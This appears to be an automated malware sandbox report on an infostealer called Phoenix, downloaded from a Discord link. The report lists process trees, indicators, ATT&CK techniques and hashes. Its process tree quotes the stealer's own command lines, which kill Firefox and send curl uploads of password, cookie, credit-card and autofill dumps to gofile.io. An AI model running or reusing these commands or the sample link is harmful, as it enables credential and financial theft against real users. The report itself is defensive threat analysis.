hxxps://cdn[.]discordapp[.]com/attachments/1254607274287304765/1255664787400953997/Phoenix[.]zip?ex=66814036&is=667feeb6&hm=be9fe75820eb9e9ace75af6ea7acb30feb9c3fc52903cc73f5a8a43a4e9d0b44&

Analysis

max time kernel
71s
max time network
80s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
29/06/2024, 18:48

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

https://cdn.discordapp.com/attachments/1254607274287304765/1255664787400953997/Phoenix.zip?ex=66814036&is=667feeb6&hm=be9fe75820eb9e9ace75af6ea7acb30feb9c3fc52903cc73f5a8a43a4e9d0b44&

Score

7^/10

spyware

Malware Config

Signatures

Loads dropped DLL 64 IoCs

pid	Process
6104	phoenixbuilder.exe
6104	phoenixbuilder.exe
6104	phoenixbuilder.exe
6104	phoenixbuilder.exe
6104	phoenixbuilder.exe
6104	phoenixbuilder.exe
6104	phoenixbuilder.exe
6104	phoenixbuilder.exe
6104	phoenixbuilder.exe
6104	phoenixbuilder.exe
6104	phoenixbuilder.exe
6104	phoenixbuilder.exe
6104	phoenixbuilder.exe
6104	phoenixbuilder.exe
6104	phoenixbuilder.exe
6104	phoenixbuilder.exe
6104	phoenixbuilder.exe
6104	phoenixbuilder.exe
6104	phoenixbuilder.exe
6104	phoenixbuilder.exe
6104	phoenixbuilder.exe
6104	phoenixbuilder.exe
6104	phoenixbuilder.exe
6104	phoenixbuilder.exe
6104	phoenixbuilder.exe
6104	phoenixbuilder.exe
6104	phoenixbuilder.exe
6104	phoenixbuilder.exe
6104	phoenixbuilder.exe
6104	phoenixbuilder.exe
6104	phoenixbuilder.exe
6104	phoenixbuilder.exe
6104	phoenixbuilder.exe
6104	phoenixbuilder.exe
6104	phoenixbuilder.exe
6104	phoenixbuilder.exe
6104	phoenixbuilder.exe
6104	phoenixbuilder.exe
4644	phoenixbuilder.exe
4644	phoenixbuilder.exe
4644	phoenixbuilder.exe
4644	phoenixbuilder.exe
4644	phoenixbuilder.exe
4644	phoenixbuilder.exe
4644	phoenixbuilder.exe
4644	phoenixbuilder.exe
4644	phoenixbuilder.exe
4644	phoenixbuilder.exe
4644	phoenixbuilder.exe
4644	phoenixbuilder.exe
4644	phoenixbuilder.exe
4644	phoenixbuilder.exe
4644	phoenixbuilder.exe
4644	phoenixbuilder.exe
4644	phoenixbuilder.exe
4644	phoenixbuilder.exe
4644	phoenixbuilder.exe
4644	phoenixbuilder.exe
4644	phoenixbuilder.exe
4644	phoenixbuilder.exe
4644	phoenixbuilder.exe
4644	phoenixbuilder.exe
4644	phoenixbuilder.exe
4644	phoenixbuilder.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 64 IoCs

Web Service

T1102

flow	ioc
104	discord.com
132	discord.com
138	discord.com
82	discord.com
92	discord.com
136	discord.com
144	discord.com
72	discord.com
87	discord.com
112	discord.com
140	discord.com
68	discord.com
139	discord.com
151	discord.com
89	discord.com
116	discord.com
150	discord.com
115	discord.com
88	discord.com
95	discord.com
119	discord.com
147	discord.com
84	discord.com
105	discord.com
106	discord.com
117	discord.com
100	discord.com
96	discord.com
97	discord.com
101	discord.com
145	discord.com
146	discord.com
93	discord.com
85	discord.com
99	discord.com
113	discord.com
143	discord.com
61	discord.com
103	discord.com
134	discord.com
142	discord.com
70	discord.com
137	discord.com
130	discord.com
83	discord.com
59	discord.com
90	discord.com
118	discord.com
141	discord.com
74	discord.com
131	discord.com
80	discord.com
94	discord.com
98	discord.com
102	discord.com
121	discord.com
135	discord.com
148	discord.com
79	discord.com
152	discord.com
91	discord.com
129	discord.com
133	discord.com
149	discord.com

Looks up external IP address via web service 3 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
45	api.ipify.org
46	api.ipify.org
107	api.ipify.org

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Kills process with taskkill 2 IoCs

evasion

pid	Process
5360	taskkill.exe
4428	taskkill.exe

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings	OpenWith.exe

Opens file in notepad (likely ransom note) 1 IoCs

ransomware

pid	Process
1028	NOTEPAD.EXE

Suspicious behavior: EnumeratesProcesses 8 IoCs

pid	Process
1952	msedge.exe
1952	msedge.exe
2576	msedge.exe
2576	msedge.exe
2344	identity_helper.exe
2344	identity_helper.exe
4320	msedge.exe
4320	msedge.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
5724	OpenWith.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs

pid	Process
2576	msedge.exe
2576	msedge.exe
2576	msedge.exe
2576	msedge.exe
2576	msedge.exe
2576	msedge.exe
2576	msedge.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	5360	taskkill.exe
Token: SeDebugPrivilege	4428	taskkill.exe

Suspicious use of FindShellTrayWindow 39 IoCs

pid	Process
2576	msedge.exe
2576	msedge.exe
2576	msedge.exe
2576	msedge.exe
2576	msedge.exe
2576	msedge.exe
2576	msedge.exe
2576	msedge.exe
2576	msedge.exe
2576	msedge.exe
2576	msedge.exe
2576	msedge.exe
2576	msedge.exe
2576	msedge.exe
2576	msedge.exe
2576	msedge.exe
2576	msedge.exe
2576	msedge.exe
2576	msedge.exe
2576	msedge.exe
2576	msedge.exe
2576	msedge.exe
2576	msedge.exe
2576	msedge.exe
2576	msedge.exe
2576	msedge.exe
2576	msedge.exe
2576	msedge.exe
2576	msedge.exe
2576	msedge.exe
2576	msedge.exe
2576	msedge.exe
2576	msedge.exe
2576	msedge.exe
2576	msedge.exe
2576	msedge.exe
2576	msedge.exe
2576	msedge.exe
2576	msedge.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
2576	msedge.exe
2576	msedge.exe
2576	msedge.exe
2576	msedge.exe
2576	msedge.exe
2576	msedge.exe
2576	msedge.exe
2576	msedge.exe
2576	msedge.exe
2576	msedge.exe
2576	msedge.exe
2576	msedge.exe
2576	msedge.exe
2576	msedge.exe
2576	msedge.exe
2576	msedge.exe
2576	msedge.exe
2576	msedge.exe
2576	msedge.exe
2576	msedge.exe
2576	msedge.exe
2576	msedge.exe
2576	msedge.exe
2576	msedge.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
5724	OpenWith.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2576 wrote to memory of 2360	2576	msedge.exe	81
PID 2576 wrote to memory of 2360	2576	msedge.exe	81
PID 2576 wrote to memory of 740	2576	msedge.exe	82
PID 2576 wrote to memory of 740	2576	msedge.exe	82
PID 2576 wrote to memory of 740	2576	msedge.exe	82
PID 2576 wrote to memory of 740	2576	msedge.exe	82
PID 2576 wrote to memory of 740	2576	msedge.exe	82
PID 2576 wrote to memory of 740	2576	msedge.exe	82
PID 2576 wrote to memory of 740	2576	msedge.exe	82
PID 2576 wrote to memory of 740	2576	msedge.exe	82
PID 2576 wrote to memory of 740	2576	msedge.exe	82
PID 2576 wrote to memory of 740	2576	msedge.exe	82
PID 2576 wrote to memory of 740	2576	msedge.exe	82
PID 2576 wrote to memory of 740	2576	msedge.exe	82
PID 2576 wrote to memory of 740	2576	msedge.exe	82
PID 2576 wrote to memory of 740	2576	msedge.exe	82
PID 2576 wrote to memory of 740	2576	msedge.exe	82
PID 2576 wrote to memory of 740	2576	msedge.exe	82
PID 2576 wrote to memory of 740	2576	msedge.exe	82
PID 2576 wrote to memory of 740	2576	msedge.exe	82
PID 2576 wrote to memory of 740	2576	msedge.exe	82
PID 2576 wrote to memory of 740	2576	msedge.exe	82
PID 2576 wrote to memory of 740	2576	msedge.exe	82
PID 2576 wrote to memory of 740	2576	msedge.exe	82
PID 2576 wrote to memory of 740	2576	msedge.exe	82
PID 2576 wrote to memory of 740	2576	msedge.exe	82
PID 2576 wrote to memory of 740	2576	msedge.exe	82
PID 2576 wrote to memory of 740	2576	msedge.exe	82
PID 2576 wrote to memory of 740	2576	msedge.exe	82
PID 2576 wrote to memory of 740	2576	msedge.exe	82
PID 2576 wrote to memory of 740	2576	msedge.exe	82
PID 2576 wrote to memory of 740	2576	msedge.exe	82
PID 2576 wrote to memory of 740	2576	msedge.exe	82
PID 2576 wrote to memory of 740	2576	msedge.exe	82
PID 2576 wrote to memory of 740	2576	msedge.exe	82
PID 2576 wrote to memory of 740	2576	msedge.exe	82
PID 2576 wrote to memory of 740	2576	msedge.exe	82
PID 2576 wrote to memory of 740	2576	msedge.exe	82
PID 2576 wrote to memory of 740	2576	msedge.exe	82
PID 2576 wrote to memory of 740	2576	msedge.exe	82
PID 2576 wrote to memory of 740	2576	msedge.exe	82
PID 2576 wrote to memory of 740	2576	msedge.exe	82
PID 2576 wrote to memory of 1952	2576	msedge.exe	83
PID 2576 wrote to memory of 1952	2576	msedge.exe	83
PID 2576 wrote to memory of 2176	2576	msedge.exe	84
PID 2576 wrote to memory of 2176	2576	msedge.exe	84
PID 2576 wrote to memory of 2176	2576	msedge.exe	84
PID 2576 wrote to memory of 2176	2576	msedge.exe	84
PID 2576 wrote to memory of 2176	2576	msedge.exe	84
PID 2576 wrote to memory of 2176	2576	msedge.exe	84
PID 2576 wrote to memory of 2176	2576	msedge.exe	84
PID 2576 wrote to memory of 2176	2576	msedge.exe	84
PID 2576 wrote to memory of 2176	2576	msedge.exe	84
PID 2576 wrote to memory of 2176	2576	msedge.exe	84
PID 2576 wrote to memory of 2176	2576	msedge.exe	84
PID 2576 wrote to memory of 2176	2576	msedge.exe	84
PID 2576 wrote to memory of 2176	2576	msedge.exe	84
PID 2576 wrote to memory of 2176	2576	msedge.exe	84
PID 2576 wrote to memory of 2176	2576	msedge.exe	84
PID 2576 wrote to memory of 2176	2576	msedge.exe	84
PID 2576 wrote to memory of 2176	2576	msedge.exe	84
PID 2576 wrote to memory of 2176	2576	msedge.exe	84
PID 2576 wrote to memory of 2176	2576	msedge.exe	84
PID 2576 wrote to memory of 2176	2576	msedge.exe	84

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://cdn.discordapp.com/attachments/1254607274287304765/1255664787400953997/Phoenix.zip?ex=66814036&is=667feeb6&hm=be9fe75820eb9e9ace75af6ea7acb30feb9c3fc52903cc73f5a8a43a4e9d0b44&
1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2576
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffcb7ba46f8,0x7ffcb7ba4708,0x7ffcb7ba4718
  2⤵
  PID:2360
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2236,7247126228062252880,16905589000648385869,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2240 /prefetch:2
  2⤵
  PID:740
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2236,7247126228062252880,16905589000648385869,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2292 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1952
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2236,7247126228062252880,16905589000648385869,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2840 /prefetch:8
  2⤵
  PID:2176
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,7247126228062252880,16905589000648385869,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3288 /prefetch:1
  2⤵
  PID:1732
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,7247126228062252880,16905589000648385869,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3392 /prefetch:1
  2⤵
  PID:2076
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2236,7247126228062252880,16905589000648385869,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5396 /prefetch:8
  2⤵
  PID:3856
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2236,7247126228062252880,16905589000648385869,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5396 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2344
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,7247126228062252880,16905589000648385869,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5440 /prefetch:1
  2⤵
  PID:1600
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,7247126228062252880,16905589000648385869,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5476 /prefetch:1
  2⤵
  PID:3920
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2236,7247126228062252880,16905589000648385869,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5688 /prefetch:8
  2⤵
  PID:1900
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,7247126228062252880,16905589000648385869,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5728 /prefetch:1
  2⤵
  PID:3472
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,7247126228062252880,16905589000648385869,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5884 /prefetch:1
  2⤵
  PID:3484
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,7247126228062252880,16905589000648385869,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5052 /prefetch:1
  2⤵
  PID:1028
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2236,7247126228062252880,16905589000648385869,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5468 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4320

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1904

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3692

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:736

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Temp1_Phoenix.zip\Install.bat" "
1⤵
PID:2180

C:\Users\Admin\Downloads\Phoenix\phoenixbuilder.exe
"C:\Users\Admin\Downloads\Phoenix\phoenixbuilder.exe"
1⤵
PID:5744
- C:\Users\Admin\Downloads\Phoenix\phoenixbuilder.exe
  "C:\Users\Admin\Downloads\Phoenix\phoenixbuilder.exe"
  2⤵
  - Loads dropped DLL
  PID:6104
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "ver"
    3⤵
    PID:3992
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /im firefox.exe /t /f >nul 2>&1"
    3⤵
    PID:5196
  - - C:\Windows\system32\taskkill.exe
      taskkill /im firefox.exe /t /f
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:5360
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\wppasswords.txt" https://store10.gofile.io/uploadFile"
    3⤵
    PID:3236
  - - C:\Windows\system32\curl.exe
      curl -F "file=@C:\Users\Admin\AppData\Local\Temp\wppasswords.txt" https://store10.gofile.io/uploadFile
      4⤵
      PID:1600
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\wpcookies.txt" https://store10.gofile.io/uploadFile"
    3⤵
    PID:5224
  - - C:\Windows\system32\curl.exe
      curl -F "file=@C:\Users\Admin\AppData\Local\Temp\wpcookies.txt" https://store10.gofile.io/uploadFile
      4⤵
      PID:5316
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\wpcreditcards.txt" https://store10.gofile.io/uploadFile"
    3⤵
    PID:5292
  - - C:\Windows\system32\curl.exe
      curl -F "file=@C:\Users\Admin\AppData\Local\Temp\wpcreditcards.txt" https://store10.gofile.io/uploadFile
      4⤵
      PID:5272
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\wpautofill.txt" https://store10.gofile.io/uploadFile"
    3⤵
    PID:5332
  - - C:\Windows\system32\curl.exe
      curl -F "file=@C:\Users\Admin\AppData\Local\Temp\wpautofill.txt" https://store10.gofile.io/uploadFile
      4⤵
      PID:5676
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\wphistory.txt" https://store10.gofile.io/uploadFile"
    3⤵
    PID:2036
  - - C:\Windows\system32\curl.exe
      curl -F "file=@C:\Users\Admin\AppData\Local\Temp\wphistory.txt" https://store10.gofile.io/uploadFile
      4⤵
      PID:5352
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\wpparsedcookies.txt" https://store10.gofile.io/uploadFile"
    3⤵
    PID:5384
  - - C:\Windows\system32\curl.exe
      curl -F "file=@C:\Users\Admin\AppData\Local\Temp\wpparsedcookies.txt" https://store10.gofile.io/uploadFile
      4⤵
      PID:5404
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\wpbookmarks.txt" https://store10.gofile.io/uploadFile"
    3⤵
    PID:5456
  - - C:\Windows\system32\curl.exe
      curl -F "file=@C:\Users\Admin\AppData\Local\Temp\wpbookmarks.txt" https://store10.gofile.io/uploadFile
      4⤵
      PID:5444

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\Phoenix\Install.bat" "
1⤵
PID:5524
- C:\Users\Admin\Downloads\Phoenix\phoenixbuilder.exe
  phoenixbuilder.exe
  2⤵
  PID:5568
- - C:\Users\Admin\Downloads\Phoenix\phoenixbuilder.exe
    phoenixbuilder.exe
    3⤵
    - Loads dropped DLL
    PID:4644
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "ver"
      4⤵
      PID:1944
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /im firefox.exe /t /f >nul 2>&1"
      4⤵
      PID:4828
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /im firefox.exe /t /f
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:4428
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\wppasswords.txt" https://store4.gofile.io/uploadFile"
      4⤵
      PID:5344
    - - C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\wppasswords.txt" https://store4.gofile.io/uploadFile
        5⤵
        
        PID:6124
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\wpcookies.txt" https://store4.gofile.io/uploadFile"
      4⤵
      PID:60
    - - C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\wpcookies.txt" https://store4.gofile.io/uploadFile
        5⤵
        
        PID:5264
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\wpcreditcards.txt" https://store4.gofile.io/uploadFile"
      4⤵
      PID:3372
    - - C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\wpcreditcards.txt" https://store4.gofile.io/uploadFile
        5⤵
        
        PID:1836
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\wpautofill.txt" https://store4.gofile.io/uploadFile"
      4⤵
      PID:3112
    - - C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\wpautofill.txt" https://store4.gofile.io/uploadFile
        5⤵
        
        PID:2116
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\wphistory.txt" https://store4.gofile.io/uploadFile"
      4⤵
      PID:4112
    - - C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\wphistory.txt" https://store4.gofile.io/uploadFile
        5⤵
        
        PID:3828
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\wpparsedcookies.txt" https://store4.gofile.io/uploadFile"
      4⤵
      PID:3576
    - - C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\wpparsedcookies.txt" https://store4.gofile.io/uploadFile
        5⤵
        
        PID:412
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\wpbookmarks.txt" https://store4.gofile.io/uploadFile"
      4⤵
      PID:4688
    - - C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\wpbookmarks.txt" https://store4.gofile.io/uploadFile
        5⤵
        
        PID:2700

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\Phoenix\requirements.txt
1⤵
- Opens file in notepad (likely ransom note)
PID:1028

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:5724

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
4b4f91fa1b362ba5341ecb2836438dea

SHA1
9561f5aabed742404d455da735259a2c6781fa07

SHA256
d824b742eace197ddc8b6ed5d918f390fde4b0fbf0e371b8e1f2ed40a3b6455c

SHA512
fef22217dcdd8000bc193e25129699d4b8f7a103ca4fe1613baf73ccf67090d9fbae27eb93e4bb8747455853a0a4326f2d0c38df41c8d42351cdcd4132418dac

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
eaa3db555ab5bc0cb364826204aad3f0

SHA1
a4cdfaac8de49e6e6e88b335cfeaa7c9e3c563ca

SHA256
ef7baeb1b2ab05ff3c5fbb76c2759db49294654548706c7c8e87f0cde855b86b

SHA512
e13981da51b52c15261ecabb98af32f9b920651b46b10ce0cc823c5878b22eb1420258c80deef204070d1e0bdd3a64d875ac2522e3713a3cf11657aa55aeccd4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
186B

MD5
094ab275342c45551894b7940ae9ad0d

SHA1
2e7ce26fe2eb9be641ae929d0c9cc0dfa26c018e

SHA256
ef1739b833a1048ee1bd55dcbac5b1397396faca1ad771f4d6c2fe58899495a3

SHA512
19d0c688dc1121569247111e45de732b2ab86c71aecdde34b157cfd1b25c53473ed3ade49a97f8cb2ddc4711be78fa26c9330887094e031e9a71bb5c29080b0d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
c6d2bfeb4eed2644fc739e1259d53685

SHA1
8909d8d9485a97227a16b7ff703f5157313c5729

SHA256
b56dc197c8c0840a13c5f7e37d9e38538cac813bee6ed9caaf0f2f7b70ddf746

SHA512
e21060fe687232dc02a7b5d08a4c7c82b7edb042a9b3b049721b31424579d2f2a36b4c2cea28ac4d21027f51f3ed6fc059b2c6ca06331fd99e2198642c9b19da

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
ae6285797ccb9594ac7ab3da91f82975

SHA1
2b62268fca6d38fe3aa26b9078d5860612190db3

SHA256
eaaa24c5f4b0e97207cb8e148b264c7cfbda8485924c35d4eb07bae40c563695

SHA512
